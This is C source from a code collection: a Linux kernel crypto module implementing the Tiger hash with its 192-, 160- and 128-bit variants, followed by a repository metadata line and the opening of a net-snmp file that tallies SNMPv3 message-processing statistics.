0xadc786a7f7443dbfULL, 0x0904456173b29a82ULL, 0x58bc7a66c232bd5eULL,
0xf306558c673ac8b2ULL, 0x41f639c6b6c9772aULL, 0x216defe99fda35daULL,
0x11640cc71c7be615ULL, 0x93c43694565c5527ULL, 0xea038e6246777839ULL,
0xf9abf3ce5a3e2469ULL, 0x741e768d0fd312d2ULL, 0x0144b883ced652c6ULL,
0xc20b5a5ba33f8552ULL, 0x1ae69633c3435a9dULL, 0x97a28ca4088cfdecULL,
0x8824a43c1e96f420ULL, 0x37612fa66eeea746ULL, 0x6b4cb165f9cf0e5aULL,
0x43aa1c06a0abfb4aULL, 0x7f4dc26ff162796bULL, 0x6cbacc8e54ed9b0fULL,
0xa6b7ffefd2bb253eULL, 0x2e25bc95b0a29d4fULL, 0x86d6a58bdef1388cULL,
0xded74ac576b6f054ULL, 0x8030bdbc2b45805dULL, 0x3c81af70e94d9289ULL,
0x3eff6dda9e3100dbULL, 0xb38dc39fdfcc8847ULL, 0x123885528d17b87eULL,
0xf2da0ed240b1b642ULL, 0x44cefadcd54bf9a9ULL, 0x1312200e433c7ee6ULL,
0x9ffcc84f3a78c748ULL, 0xf0cd1f72248576bbULL, 0xec6974053638cfe4ULL,
0x2ba7b67c0cec4e4cULL, 0xac2f4df3e5ce32edULL, 0xcb33d14326ea4c11ULL,
0xa4e9044cc77e58bcULL, 0x5f513293d934fcefULL, 0x5dc9645506e55444ULL,
0x50de418f317de40aULL, 0x388cb31a69dde259ULL, 0x2db4a83455820a86ULL,
0x9010a91e84711ae9ULL, 0x4df7f0b7b1498371ULL, 0xd62a2eabc0977179ULL,
0x22fac097aa8d5c0eULL
};
/* sbox3: third of the four fixed 256-entry 64-bit Tiger S-boxes. */
static const u64 sbox3[256] = {
0xf49fcc2ff1daf39bULL, 0x487fd5c66ff29281ULL, 0xe8a30667fcdca83fULL,
0x2c9b4be3d2fcce63ULL, 0xda3ff74b93fbbbc2ULL, 0x2fa165d2fe70ba66ULL,
0xa103e279970e93d4ULL, 0xbecdec77b0e45e71ULL, 0xcfb41e723985e497ULL,
0xb70aaa025ef75017ULL, 0xd42309f03840b8e0ULL, 0x8efc1ad035898579ULL,
0x96c6920be2b2abc5ULL, 0x66af4163375a9172ULL, 0x2174abdcca7127fbULL,
0xb33ccea64a72ff41ULL, 0xf04a4933083066a5ULL, 0x8d970acdd7289af5ULL,
0x8f96e8e031c8c25eULL, 0xf3fec02276875d47ULL, 0xec7bf310056190ddULL,
0xf5adb0aebb0f1491ULL, 0x9b50f8850fd58892ULL, 0x4975488358b74de8ULL,
0xa3354ff691531c61ULL, 0x0702bbe481d2c6eeULL, 0x89fb24057deded98ULL,
0xac3075138596e902ULL, 0x1d2d3580172772edULL, 0xeb738fc28e6bc30dULL,
0x5854ef8f63044326ULL, 0x9e5c52325add3bbeULL, 0x90aa53cf325c4623ULL,
0xc1d24d51349dd067ULL, 0x2051cfeea69ea624ULL, 0x13220f0a862e7e4fULL,
0xce39399404e04864ULL, 0xd9c42ca47086fcb7ULL, 0x685ad2238a03e7ccULL,
0x066484b2ab2ff1dbULL, 0xfe9d5d70efbf79ecULL, 0x5b13b9dd9c481854ULL,
0x15f0d475ed1509adULL, 0x0bebcd060ec79851ULL, 0xd58c6791183ab7f8ULL,
0xd1187c5052f3eee4ULL, 0xc95d1192e54e82ffULL, 0x86eea14cb9ac6ca2ULL,
0x3485beb153677d5dULL, 0xdd191d781f8c492aULL, 0xf60866baa784ebf9ULL,
0x518f643ba2d08c74ULL, 0x8852e956e1087c22ULL, 0xa768cb8dc410ae8dULL,
0x38047726bfec8e1aULL, 0xa67738b4cd3b45aaULL, 0xad16691cec0dde19ULL,
0xc6d4319380462e07ULL, 0xc5a5876d0ba61938ULL, 0x16b9fa1fa58fd840ULL,
0x188ab1173ca74f18ULL, 0xabda2f98c99c021fULL, 0x3e0580ab134ae816ULL,
0x5f3b05b773645abbULL, 0x2501a2be5575f2f6ULL, 0x1b2f74004e7e8ba9ULL,
0x1cd7580371e8d953ULL, 0x7f6ed89562764e30ULL, 0xb15926ff596f003dULL,
0x9f65293da8c5d6b9ULL, 0x6ecef04dd690f84cULL, 0x4782275fff33af88ULL,
0xe41433083f820801ULL, 0xfd0dfe409a1af9b5ULL, 0x4325a3342cdb396bULL,
0x8ae77e62b301b252ULL, 0xc36f9e9f6655615aULL, 0x85455a2d92d32c09ULL,
0xf2c7dea949477485ULL, 0x63cfb4c133a39ebaULL, 0x83b040cc6ebc5462ULL,
0x3b9454c8fdb326b0ULL, 0x56f56a9e87ffd78cULL, 0x2dc2940d99f42bc6ULL,
0x98f7df096b096e2dULL, 0x19a6e01e3ad852bfULL, 0x42a99ccbdbd4b40bULL,
0xa59998af45e9c559ULL, 0x366295e807d93186ULL, 0x6b48181bfaa1f773ULL,
0x1fec57e2157a0a1dULL, 0x4667446af6201ad5ULL, 0xe615ebcacfb0f075ULL,
0xb8f31f4f68290778ULL, 0x22713ed6ce22d11eULL, 0x3057c1a72ec3c93bULL,
0xcb46acc37c3f1f2fULL, 0xdbb893fd02aaf50eULL, 0x331fd92e600b9fcfULL,
0xa498f96148ea3ad6ULL, 0xa8d8426e8b6a83eaULL, 0xa089b274b7735cdcULL,
0x87f6b3731e524a11ULL, 0x118808e5cbc96749ULL, 0x9906e4c7b19bd394ULL,
0xafed7f7e9b24a20cULL, 0x6509eadeeb3644a7ULL, 0x6c1ef1d3e8ef0edeULL,
0xb9c97d43e9798fb4ULL, 0xa2f2d784740c28a3ULL, 0x7b8496476197566fULL,
0x7a5be3e6b65f069dULL, 0xf96330ed78be6f10ULL, 0xeee60de77a076a15ULL,
0x2b4bee4aa08b9bd0ULL, 0x6a56a63ec7b8894eULL, 0x02121359ba34fef4ULL,
0x4cbf99f8283703fcULL, 0x398071350caf30c8ULL, 0xd0a77a89f017687aULL,
0xf1c1a9eb9e423569ULL, 0x8c7976282dee8199ULL, 0x5d1737a5dd1f7abdULL,
0x4f53433c09a9fa80ULL, 0xfa8b0c53df7ca1d9ULL, 0x3fd9dcbc886ccb77ULL,
0xc040917ca91b4720ULL, 0x7dd00142f9d1dcdfULL, 0x8476fc1d4f387b58ULL,
0x23f8e7c5f3316503ULL, 0x032a2244e7e37339ULL, 0x5c87a5d750f5a74bULL,
0x082b4cc43698992eULL, 0xdf917becb858f63cULL, 0x3270b8fc5bf86ddaULL,
0x10ae72bb29b5dd76ULL, 0x576ac94e7700362bULL, 0x1ad112dac61efb8fULL,
0x691bc30ec5faa427ULL, 0xff246311cc327143ULL, 0x3142368e30e53206ULL,
0x71380e31e02ca396ULL, 0x958d5c960aad76f1ULL, 0xf8d6f430c16da536ULL,
0xc8ffd13f1be7e1d2ULL, 0x7578ae66004ddbe1ULL, 0x05833f01067be646ULL,
0xbb34b5ad3bfe586dULL, 0x095f34c9a12b97f0ULL, 0x247ab64525d60ca8ULL,
0xdcdbc6f3017477d1ULL, 0x4a2e14d4decad24dULL, 0xbdb5e6d9be0a1eebULL,
0x2a7e70f7794301abULL, 0xdef42d8a270540fdULL, 0x01078ec0a34c22c1ULL,
0xe5de511af4c16387ULL, 0x7ebb3a52bd9a330aULL, 0x77697857aa7d6435ULL,
0x004e831603ae4c32ULL, 0xe7a21020ad78e312ULL, 0x9d41a70c6ab420f2ULL,
0x28e06c18ea1141e6ULL, 0xd2b28cbd984f6b28ULL, 0x26b75f6c446e9d83ULL,
0xba47568c4d418d7fULL, 0xd80badbfe6183d8eULL, 0x0e206d7f5f166044ULL,
0xe258a43911cbca3eULL, 0x723a1746b21dc0bcULL, 0xc7caa854f5d7cdd3ULL,
0x7cac32883d261d9cULL, 0x7690c26423ba942cULL, 0x17e55524478042b8ULL,
0xe0be477656a2389fULL, 0x4d289b5e67ab2da0ULL, 0x44862b9c8fbbfd31ULL,
0xb47cc8049d141365ULL, 0x822c1b362b91c793ULL, 0x4eb14655fb13dfd8ULL,
0x1ecbba0714e2a97bULL, 0x6143459d5cde5f14ULL, 0x53a8fbf1d5f0ac89ULL,
0x97ea04d81c5e5b00ULL, 0x622181a8d4fdb3f3ULL, 0xe9bcd341572a1208ULL,
0x1411258643cce58aULL, 0x9144c5fea4c6e0a4ULL, 0x0d33d06565cf620fULL,
0x54a48d489f219ca1ULL, 0xc43e5eac6d63c821ULL, 0xa9728b3a72770dafULL,
0xd7934e7b20df87efULL, 0xe35503b61a3e86e5ULL, 0xcae321fbc819d504ULL,
0x129a50b3ac60bfa6ULL, 0xcd5e68ea7e9fb6c3ULL, 0xb01c90199483b1c7ULL,
0x3de93cd5c295376cULL, 0xaed52edf2ab9ad13ULL, 0x2e60f512c0a07884ULL,
0xbc3d86a3e36210c9ULL, 0x35269d9b163951ceULL, 0x0c7d6e2ad0cdb5faULL,
0x59e86297d87f5733ULL, 0x298ef221898db0e7ULL, 0x55000029d1a5aa7eULL,
0x8bc08ae1b5061b45ULL, 0xc2c31c2b6c92703aULL, 0x94cc596baf25ef42ULL,
0x0a1d73db22540456ULL, 0x04b6a0f9d9c4179aULL, 0xeffdafa2ae3d3c60ULL,
0xf7c8075bb49496c4ULL, 0x9cc5c7141d1cd4e3ULL, 0x78bd1638218e5534ULL,
0xb2f11568f850246aULL, 0xedfabcfa9502bc29ULL, 0x796ce5f2da23051bULL,
0xaae128b0dc93537cULL, 0x3a493da0ee4b29aeULL, 0xb5df6b2c416895d7ULL,
0xfcabbd25122d7f37ULL, 0x70810b58105dc4b1ULL, 0xe10fdd37f7882a90ULL,
0x524dcab5518a3f5cULL, 0x3c9e85878451255bULL, 0x4029828119bd34e2ULL,
0x74a05b6f5d3ceccbULL, 0xb610021542e13ecaULL, 0x0ff979d12f59e2acULL,
0x6037da27e4f9cc50ULL, 0x5e92975a0df1847dULL, 0xd66de190d3e623feULL,
0x5032d6b87b568048ULL, 0x9a36b7ce8235216eULL, 0x80272a7a24f64b4aULL,
0x93efed8b8c6916f7ULL, 0x37ddbff44cce1555ULL, 0x4b95db5d4b99bd25ULL,
0x92d3fda169812fc0ULL, 0xfb1a4a9a90660bb6ULL, 0x730c196946a4b9b2ULL,
0x81e289aa7f49da68ULL, 0x64669a0f83b1a05fULL, 0x27b3ff7d9644f48bULL,
0xcc6b615c8db675b3ULL, 0x674f20b9bcebbe95ULL, 0x6f31238275655982ULL,
0x5ae488713e45cf05ULL, 0xbf619f9954c21157ULL, 0xeabac46040a8eae9ULL,
0x454c6fe9f2c0c1cdULL, 0x419cf6496412691cULL, 0xd3dc3bef265b0f70ULL,
0x6d0e60f5c3578a9eULL
};
/* sbox4: fourth of the four fixed 256-entry 64-bit Tiger S-boxes. */
static const u64 sbox4[256] = {
0x5b0e608526323c55ULL, 0x1a46c1a9fa1b59f5ULL, 0xa9e245a17c4c8ffaULL,
0x65ca5159db2955d7ULL, 0x05db0a76ce35afc2ULL, 0x81eac77ea9113d45ULL,
0x528ef88ab6ac0a0dULL, 0xa09ea253597be3ffULL, 0x430ddfb3ac48cd56ULL,
0xc4b3a67af45ce46fULL, 0x4ececfd8fbe2d05eULL, 0x3ef56f10b39935f0ULL,
0x0b22d6829cd619c6ULL, 0x17fd460a74df2069ULL, 0x6cf8cc8e8510ed40ULL,
0xd6c824bf3a6ecaa7ULL, 0x61243d581a817049ULL, 0x048bacb6bbc163a2ULL,
0xd9a38ac27d44cc32ULL, 0x7fddff5baaf410abULL, 0xad6d495aa804824bULL,
0xe1a6a74f2d8c9f94ULL, 0xd4f7851235dee8e3ULL, 0xfd4b7f886540d893ULL,
0x247c20042aa4bfdaULL, 0x096ea1c517d1327cULL, 0xd56966b4361a6685ULL,
0x277da5c31221057dULL, 0x94d59893a43acff7ULL, 0x64f0c51ccdc02281ULL,
0x3d33bcc4ff6189dbULL, 0xe005cb184ce66af1ULL, 0xff5ccd1d1db99beaULL,
0xb0b854a7fe42980fULL, 0x7bd46a6a718d4b9fULL, 0xd10fa8cc22a5fd8cULL,
0xd31484952be4bd31ULL, 0xc7fa975fcb243847ULL, 0x4886ed1e5846c407ULL,
0x28cddb791eb70b04ULL, 0xc2b00be2f573417fULL, 0x5c9590452180f877ULL,
0x7a6bddfff370eb00ULL, 0xce509e38d6d9d6a4ULL, 0xebeb0f00647fa702ULL,
0x1dcc06cf76606f06ULL, 0xe4d9f28ba286ff0aULL, 0xd85a305dc918c262ULL,
0x475b1d8732225f54ULL, 0x2d4fb51668ccb5feULL, 0xa679b9d9d72bba20ULL,
0x53841c0d912d43a5ULL, 0x3b7eaa48bf12a4e8ULL, 0x781e0e47f22f1ddfULL,
0xeff20ce60ab50973ULL, 0x20d261d19dffb742ULL, 0x16a12b03062a2e39ULL,
0x1960eb2239650495ULL, 0x251c16fed50eb8b8ULL, 0x9ac0c330f826016eULL,
0xed152665953e7671ULL, 0x02d63194a6369570ULL, 0x5074f08394b1c987ULL,
0x70ba598c90b25ce1ULL, 0x794a15810b9742f6ULL, 0x0d5925e9fcaf8c6cULL,
0x3067716cd868744eULL, 0x910ab077e8d7731bULL, 0x6a61bbdb5ac42f61ULL,
0x93513efbf0851567ULL, 0xf494724b9e83e9d5ULL, 0xe887e1985c09648dULL,
0x34b1d3c675370cfdULL, 0xdc35e433bc0d255dULL, 0xd0aab84234131be0ULL,
0x08042a50b48b7eafULL, 0x9997c4ee44a3ab35ULL, 0x829a7b49201799d0ULL,
0x263b8307b7c54441ULL, 0x752f95f4fd6a6ca6ULL, 0x927217402c08c6e5ULL,
0x2a8ab754a795d9eeULL, 0xa442f7552f72943dULL, 0x2c31334e19781208ULL,
0x4fa98d7ceaee6291ULL, 0x55c3862f665db309ULL, 0xbd0610175d53b1f3ULL,
0x46fe6cb840413f27ULL, 0x3fe03792df0cfa59ULL, 0xcfe700372eb85e8fULL,
0xa7be29e7adbce118ULL, 0xe544ee5cde8431ddULL, 0x8a781b1b41f1873eULL,
0xa5c94c78a0d2f0e7ULL, 0x39412e2877b60728ULL, 0xa1265ef3afc9a62cULL,
0xbcc2770c6a2506c5ULL, 0x3ab66dd5dce1ce12ULL, 0xe65499d04a675b37ULL,
0x7d8f523481bfd216ULL, 0x0f6f64fcec15f389ULL, 0x74efbe618b5b13c8ULL,
0xacdc82b714273e1dULL, 0xdd40bfe003199d17ULL, 0x37e99257e7e061f8ULL,
0xfa52626904775aaaULL, 0x8bbbf63a463d56f9ULL, 0xf0013f1543a26e64ULL,
0xa8307e9f879ec898ULL, 0xcc4c27a4150177ccULL, 0x1b432f2cca1d3348ULL,
0xde1d1f8f9f6fa013ULL, 0x606602a047a7ddd6ULL, 0xd237ab64cc1cb2c7ULL,
0x9b938e7225fcd1d3ULL, 0xec4e03708e0ff476ULL, 0xfeb2fbda3d03c12dULL,
0xae0bced2ee43889aULL, 0x22cb8923ebfb4f43ULL, 0x69360d013cf7396dULL,
0x855e3602d2d4e022ULL, 0x073805bad01f784cULL, 0x33e17a133852f546ULL,
0xdf4874058ac7b638ULL, 0xba92b29c678aa14aULL, 0x0ce89fc76cfaadcdULL,
0x5f9d4e0908339e34ULL, 0xf1afe9291f5923b9ULL, 0x6e3480f60f4a265fULL,
0xeebf3a2ab29b841cULL, 0xe21938a88f91b4adULL, 0x57dfeff845c6d3c3ULL,
0x2f006b0bf62caaf2ULL, 0x62f479ef6f75ee78ULL, 0x11a55ad41c8916a9ULL,
0xf229d29084fed453ULL, 0x42f1c27b16b000e6ULL, 0x2b1f76749823c074ULL,
0x4b76eca3c2745360ULL, 0x8c98f463b91691bdULL, 0x14bcc93cf1ade66aULL,
0x8885213e6d458397ULL, 0x8e177df0274d4711ULL, 0xb49b73b5503f2951ULL,
0x10168168c3f96b6bULL, 0x0e3d963b63cab0aeULL, 0x8dfc4b5655a1db14ULL,
0xf789f1356e14de5cULL, 0x683e68af4e51dac1ULL, 0xc9a84f9d8d4b0fd9ULL,
0x3691e03f52a0f9d1ULL, 0x5ed86e46e1878e80ULL, 0x3c711a0e99d07150ULL,
0x5a0865b20c4e9310ULL, 0x56fbfc1fe4f0682eULL, 0xea8d5de3105edf9bULL,
0x71abfdb12379187aULL, 0x2eb99de1bee77b9cULL, 0x21ecc0ea33cf4523ULL,
0x59a4d7521805c7a1ULL, 0x3896f5eb56ae7c72ULL, 0xaa638f3db18f75dcULL,
0x9f39358dabe9808eULL, 0xb7defa91c00b72acULL, 0x6b5541fd62492d92ULL,
0x6dc6dee8f92e4d5bULL, 0x353f57abc4beea7eULL, 0x735769d6da5690ceULL,
0x0a234aa642391484ULL, 0xf6f9508028f80d9dULL, 0xb8e319a27ab3f215ULL,
0x31ad9c1151341a4dULL, 0x773c22a57bef5805ULL, 0x45c7561a07968633ULL,
0xf913da9e249dbe36ULL, 0xda652d9b78a64c68ULL, 0x4c27a97f3bc334efULL,
0x76621220e66b17f4ULL, 0x967743899acd7d0bULL, 0xf3ee5bcae0ed6782ULL,
0x409f753600c879fcULL, 0x06d09a39b5926db6ULL, 0x6f83aeb0317ac588ULL,
0x01e6ca4a86381f21ULL, 0x66ff3462d19f3025ULL, 0x72207c24ddfd3bfbULL,
0x4af6b6d3e2ece2ebULL, 0x9c994dbec7ea08deULL, 0x49ace597b09a8bc4ULL,
0xb38c4766cf0797baULL, 0x131b9373c57c2a75ULL, 0xb1822cce61931e58ULL,
0x9d7555b909ba1c0cULL, 0x127fafdd937d11d2ULL, 0x29da3badc66d92e4ULL,
0xa2c1d57154c2ecbcULL, 0x58c5134d82f6fe24ULL, 0x1c3ae3515b62274fULL,
0xe907c82e01cb8126ULL, 0xf8ed091913e37fcbULL, 0x3249d8f9c80046c9ULL,
0x80cf9bede388fb63ULL, 0x1881539a116cf19eULL, 0x5103f3f76bd52457ULL,
0x15b7e6f5ae47f7a8ULL, 0xdbd7c6ded47e9ccfULL, 0x44e55c410228bb1aULL,
0xb647d4255edb4e99ULL, 0x5d11882bb8aafc30ULL, 0xf5098bbb29d3212aULL,
0x8fb5ea14e90296b3ULL, 0x677b942157dd025aULL, 0xfb58e7c0a390acb5ULL,
0x89d3674c83bd4a01ULL, 0x9e2da4df4bf3b93bULL, 0xfcc41e328cab4829ULL,
0x03f38c96ba582c52ULL, 0xcad1bdbd7fd85db2ULL, 0xbbb442c16082ae83ULL,
0xb95fe86ba5da9ab0ULL, 0xb22e04673771a93fULL, 0x845358c9493152d8ULL,
0xbe2a488697b4541eULL, 0x95a2dc2dd38e6966ULL, 0xc02c11ac923c852bULL,
0x2388b1990df2a87bULL, 0x7c8008fa1b4f37beULL, 0x1f70d0c84d54e503ULL,
0x5490adec7ece57d4ULL, 0x002b3c27d9063a3aULL, 0x7eaea3848030a2bfULL,
0xc602326ded2003c0ULL, 0x83a7287d69a94086ULL, 0xc57a5fcb30f57a8aULL,
0xb56844e479ebe779ULL, 0xa373b40f05dcbce9ULL, 0xd71a786e88570ee2ULL,
0x879cbacdbde8f6a0ULL, 0x976ad1bcc164a32fULL, 0xab21e25e9666d78bULL,
0x901063aae5e5c33cULL, 0x9818b34448698d90ULL, 0xe36487ae3e1e8abbULL,
0xafbdf931893bdcb4ULL, 0x6345a0dc5fbbd519ULL, 0x8628fe269b9465caULL,
0x1e5d01603f9c51ecULL, 0x4de44006a15049b7ULL, 0xbf6c70e5f776cbb1ULL,
0x411218f2ef552bedULL, 0xcb0c0708705a36a3ULL, 0xe74d14754f986044ULL,
0xcd56d9430ea8280eULL, 0xc12591d7535f5065ULL, 0xc83223f1720aef96ULL,
0xc3a0396f7363a51fULL
};
/*
 * One Tiger round: mix message word X into the state triple (a, b, c).
 *
 * c is XORed with the word; a is decremented by an S-box combination of
 * the even bytes of c; b is incremented by a combination of the odd
 * bytes of c and then scaled by the pass multiplier.
 */
static void tgr192_round(u64 * ra, u64 * rb, u64 * rc, u64 x, int mul)
{
	u64 a = *ra, b = *rb, c = *rc;
	u64 even_mix, odd_mix;

	c ^= x;
	even_mix = sbox1[c & 0xff] ^ sbox2[(c >> 16) & 0xff]
	    ^ sbox3[(c >> 32) & 0xff] ^ sbox4[(c >> 48) & 0xff];
	odd_mix = sbox4[(c >> 8) & 0xff] ^ sbox3[(c >> 24) & 0xff]
	    ^ sbox2[(c >> 40) & 0xff] ^ sbox1[(c >> 56) & 0xff];
	a -= even_mix;
	b += odd_mix;
	b *= mul;

	*ra = a;
	*rb = b;
	*rc = c;
}
/*
 * One Tiger pass: eight rounds over the message schedule x[0..7].
 * The roles of the three state words rotate (a,b,c) -> (b,c,a) ->
 * (c,a,b) after each round, which the i % 3 dispatch below encodes.
 */
static void tgr192_pass(u64 * ra, u64 * rb, u64 * rc, u64 * x, int mul)
{
	u64 a = *ra, b = *rb, c = *rc;
	int i;

	for (i = 0; i < 8; i++) {
		switch (i % 3) {
		case 0:
			tgr192_round(&a, &b, &c, x[i], mul);
			break;
		case 1:
			tgr192_round(&b, &c, &a, x[i], mul);
			break;
		default:
			tgr192_round(&c, &a, &b, x[i], mul);
			break;
		}
	}

	*ra = a;
	*rb = b;
	*rc = c;
}
/*
 * Tiger key schedule: derives the message words for the next pass from
 * the current ones, in place. Two dependent mixing sweeps over x[0..7]
 * with the fixed constants from the Tiger specification; the statement
 * order is significant and must not be changed.
 */
static void tgr192_key_schedule(u64 * x)
{
x[0] -= x[7] ^ 0xa5a5a5a5a5a5a5a5ULL;
x[1] ^= x[0];
x[2] += x[1];
x[3] -= x[2] ^ ((~x[1]) << 19);
x[4] ^= x[3];
x[5] += x[4];
x[6] -= x[5] ^ ((~x[4]) >> 23);
x[7] ^= x[6];
x[0] += x[7];
x[1] -= x[0] ^ ((~x[7]) << 19);
x[2] ^= x[1];
x[3] += x[2];
x[4] -= x[3] ^ ((~x[2]) >> 23);
x[5] ^= x[4];
x[6] += x[5];
x[7] -= x[6] ^ 0x0123456789abcdefULL;
}
/****************
 * Transform the message DATA, one 64-byte block (eight 64-bit words;
 * the original comment said "512 bytes", which was wrong — the block
 * is 512 bits).
 */
static void tgr192_transform(struct tgr192_ctx *tctx, const u8 * data)
{
	u64 a, b, c, aa, bb, cc;
	u64 x[8];
	int i;
	const __le64 *in = (const __le64 *)data;

	/* Load the block as eight little-endian 64-bit words. */
	for (i = 0; i < 8; i++)
		x[i] = le64_to_cpu(in[i]);

	/* Save the incoming state for the feed-forward step. */
	aa = a = tctx->a;
	bb = b = tctx->b;
	cc = c = tctx->c;

	/* Three passes with multipliers 5, 7 and 9, key schedule between. */
	tgr192_pass(&a, &b, &c, x, 5);
	tgr192_key_schedule(x);
	tgr192_pass(&c, &a, &b, x, 7);
	tgr192_key_schedule(x);
	tgr192_pass(&b, &c, &a, x, 9);

	/* Feed-forward against the saved state. */
	a ^= aa;
	b -= bb;
	c += cc;

	tctx->a = a;
	tctx->b = b;
	tctx->c = c;
}
/* Reset the digest state to the Tiger initial chaining values. */
static int tgr192_init(struct shash_desc *desc)
{
	struct tgr192_ctx *ctx = shash_desc_ctx(desc);

	ctx->a = 0x0123456789abcdefULL;
	ctx->b = 0xfedcba9876543210ULL;
	ctx->c = 0xf096a5b4c3b2e187ULL;
	ctx->nblocks = 0;
	ctx->count = 0;
	return 0;
}
/*
 * Update the message digest with the contents of INBUF with length LEN.
 * A NULL inbuf only flushes a completely filled 64-byte buffer (used
 * internally by tgr192_final).
 */
static int tgr192_update(struct shash_desc *desc, const u8 *inbuf,
unsigned int len)
{
	struct tgr192_ctx *tctx = shash_desc_ctx(desc);

	/* Flush a buffer that was filled by a previous call. */
	if (tctx->count == 64) {
		tgr192_transform(tctx, tctx->hash);
		tctx->count = 0;
		tctx->nblocks++;
	}
	if (!inbuf)
		return 0;

	/* Top up a partially filled buffer first. */
	if (tctx->count) {
		while (len && tctx->count < 64) {
			tctx->hash[tctx->count++] = *inbuf++;
			len--;
		}
		/* Inline flush, equivalent to tgr192_update(desc, NULL, 0). */
		if (tctx->count == 64) {
			tgr192_transform(tctx, tctx->hash);
			tctx->count = 0;
			tctx->nblocks++;
		}
		if (!len)
			return 0;
	}

	/* Hash whole 64-byte blocks straight from the input. */
	while (len >= 64) {
		tgr192_transform(tctx, inbuf);
		tctx->count = 0;
		tctx->nblocks++;
		inbuf += 64;
		len -= 64;
	}

	/* Buffer whatever remains for the next call. */
	while (len && tctx->count < 64) {
		tctx->hash[tctx->count++] = *inbuf++;
		len--;
	}
	return 0;
}
/* The routine terminates the computation: pads the buffered input,
 * appends the 64-bit message bit count, runs the last transform and
 * writes the big-endian 192-bit digest to OUT. */
static int tgr192_final(struct shash_desc *desc, u8 * out)
{
struct tgr192_ctx *tctx = shash_desc_ctx(desc);
__be64 *dst = (__be64 *)out;
__be64 *be64p;
__le32 *le32p;
u32 t, msb, lsb;
tgr192_update(desc, NULL, 0); /* flush */ ;
/* Build the 64-bit bit count (msb:lsb) with manual carry checks,
 * since nblocks/count are kept as 32-bit quantities. */
msb = 0;
t = tctx->nblocks;
if ((lsb = t << 6) < t) { /* multiply by 64 to make a byte count */
msb++;
}
msb += t >> 26;
t = lsb;
if ((lsb = t + tctx->count) < t) { /* add the count */
msb++;
}
t = lsb;
if ((lsb = t << 3) < t) { /* multiply by 8 to make a bit count */
msb++;
}
msb += t >> 29;
if (tctx->count < 56) { /* enough room */
tctx->hash[tctx->count++] = 0x01; /* pad */
while (tctx->count < 56) {
tctx->hash[tctx->count++] = 0; /* pad */
}
} else { /* need one extra block */
tctx->hash[tctx->count++] = 0x01; /* pad character */
while (tctx->count < 64) {
tctx->hash[tctx->count++] = 0;
}
tgr192_update(desc, NULL, 0); /* flush */ ;
memset(tctx->hash, 0, 56); /* fill next block with zeroes */
}
/* append the 64 bit count (stored as two little-endian 32-bit words,
 * matching the reference implementation) */
le32p = (__le32 *)&tctx->hash[56];
le32p[0] = cpu_to_le32(lsb);
le32p[1] = cpu_to_le32(msb);
tgr192_transform(tctx, tctx->hash);
/* Emit a, b, c big-endian; also mirror the digest back into the
 * context buffer for the truncated variants. */
be64p = (__be64 *)tctx->hash;
dst[0] = be64p[0] = cpu_to_be64(tctx->a);
dst[1] = be64p[1] = cpu_to_be64(tctx->b);
dst[2] = be64p[2] = cpu_to_be64(tctx->c);
return 0;
}
/* Tiger/160: compute the full 192-bit digest, keep the first 20 bytes
 * and scrub the temporary copy from the stack. */
static int tgr160_final(struct shash_desc *desc, u8 * out)
{
	u8 digest[64];

	tgr192_final(desc, digest);
	memcpy(out, digest, TGR160_DIGEST_SIZE);
	memzero_explicit(digest, TGR192_DIGEST_SIZE);
	return 0;
}
/* Tiger/128: compute the full 192-bit digest, keep the first 16 bytes
 * and scrub the temporary copy from the stack. */
static int tgr128_final(struct shash_desc *desc, u8 * out)
{
	u8 digest[64];

	tgr192_final(desc, digest);
	memcpy(out, digest, TGR128_DIGEST_SIZE);
	memzero_explicit(digest, TGR192_DIGEST_SIZE);
	return 0;
}
/* Full 192-bit Tiger digest, registered with the shash API. */
static struct shash_alg tgr192 = {
.digestsize = TGR192_DIGEST_SIZE,
.init = tgr192_init,
.update = tgr192_update,
.final = tgr192_final,
.descsize = sizeof(struct tgr192_ctx),
.base = {
.cra_name = "tgr192",
.cra_flags = CRYPTO_ALG_TYPE_SHASH,
.cra_blocksize = TGR192_BLOCK_SIZE,
.cra_module = THIS_MODULE,
}
};
/* Tiger/160: shares init/update with tgr192, truncates in tgr160_final. */
static struct shash_alg tgr160 = {
.digestsize = TGR160_DIGEST_SIZE,
.init = tgr192_init,
.update = tgr192_update,
.final = tgr160_final,
.descsize = sizeof(struct tgr192_ctx),
.base = {
.cra_name = "tgr160",
.cra_flags = CRYPTO_ALG_TYPE_SHASH,
.cra_blocksize = TGR192_BLOCK_SIZE,
.cra_module = THIS_MODULE,
}
};
/* Tiger/128: shares init/update with tgr192, truncates in tgr128_final. */
static struct shash_alg tgr128 = {
.digestsize = TGR128_DIGEST_SIZE,
.init = tgr192_init,
.update = tgr192_update,
.final = tgr128_final,
.descsize = sizeof(struct tgr192_ctx),
.base = {
.cra_name = "tgr128",
.cra_flags = CRYPTO_ALG_TYPE_SHASH,
.cra_blocksize = TGR192_BLOCK_SIZE,
.cra_module = THIS_MODULE,
}
};
/*
 * Register the three Tiger digest variants, unwinding the earlier
 * registrations if a later one fails.
 */
static int __init tgr192_mod_init(void)
{
	int ret;

	ret = crypto_register_shash(&tgr192);
	if (ret < 0)
		return ret;

	ret = crypto_register_shash(&tgr160);
	if (ret < 0) {
		crypto_unregister_shash(&tgr192);
		return ret;
	}

	ret = crypto_register_shash(&tgr128);
	if (ret < 0) {
		crypto_unregister_shash(&tgr192);
		crypto_unregister_shash(&tgr160);
	}
	return ret;
}
/* Unregister all three Tiger variants on module unload. */
static void __exit tgr192_mod_fini(void)
{
crypto_unregister_shash(&tgr192);
crypto_unregister_shash(&tgr160);
crypto_unregister_shash(&tgr128);
}
/* Allow autoloading by the truncated-variant algorithm names too
 * (the module's own name already covers "tgr192"). */
MODULE_ALIAS("tgr160");
MODULE_ALIAS("tgr128");
module_init(tgr192_mod_init);
module_exit(tgr192_mod_fini);
MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("Tiger Message Digest Algorithm");
| gpl-2.0 |
robacklin/uclinux-users | net-snmp/agent/mibgroup/snmpv3/snmpMPDStats.c | 4 | 2063 | /*
* snmpMPDStats.c: tallies errors for SNMPv3 message processing.
*/
#include <net-snmp/net-snmp-config.h>
#if HAVE_WINSOCK_H
#include <winsock.h>
#endif
#include <net-snmp/net-snmp-includes.h>
#include <net-snmp/agent/net-snmp-agent-includes.h>
#include <net-snmp/agent/sysORTable.h>
#include "snmpMPDStats.h"
#include "util_funcs/header_generic.h"
/*
 * OID-suffix -> handler table for the snmpMPD group: three read-only
 * Counter objects, all served by var_snmpMPDStats (the trailing {N}
 * is the sub-identifier under snmpMPDStats_variables_oid).
 */
struct variable2 snmpMPDStats_variables[] = {
